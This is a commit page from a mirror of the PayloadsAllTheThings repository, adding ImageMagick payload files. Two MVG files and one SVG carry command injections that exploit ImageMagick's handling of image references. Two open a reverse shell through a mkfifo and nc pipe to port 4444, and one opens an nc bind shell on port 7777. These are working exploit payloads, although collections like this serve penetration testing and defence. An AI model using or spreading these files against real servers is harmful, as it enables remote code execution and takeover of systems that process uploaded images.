mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 21:35:27 +00:00
Image Magick - More payloads
This commit is contained in:
parent
c4b49fa5ac
commit
9907a55c24
@ -0,0 +1,8 @@
|
|||||||
|
push graphic-context
|
||||||
|
encoding "UTF-8"
|
||||||
|
viewbox 0 0 1 1
|
||||||
|
affine 1 0 0 1 0 0
|
||||||
|
push graphic-context
|
||||||
|
image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 127.0.0.1 4444 0</tmp/gjdpez | /bin/sh >/tmp/gjdpez 2>&1; rm /tmp/gjdpez '
|
||||||
|
pop graphic-context
|
||||||
|
pop graphic-context
|
@ -0,0 +1,4 @@
|
|||||||
|
push graphic-context
|
||||||
|
viewbox 0 0 640 480
|
||||||
|
fill 'url(https://example.com/image.jpg"|nc -l -p 7777 -e"/bin/sh)'
|
||||||
|
pop graphic-context
|
Before Width: | Height: | Size: 424 B After Width: | Height: | Size: 424 B |
@ -0,0 +1,5 @@
|
|||||||
|
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
|
||||||
|
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||||
|
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve"> <image id="image0" width="1" height="1" x="0" y="0"
|
||||||
|
xlink:href="|mkfifo /tmp/sokt; nc 127.0.0.1 4444 0</tmp/sokt | /bin/sh >/tmp/sokt 2>&1; rm /tmp/sokt " />
|
||||||
|
</svg>
|
After Width: | Height: | Size: 992 B |
Loading…
Reference in New Issue
Block a user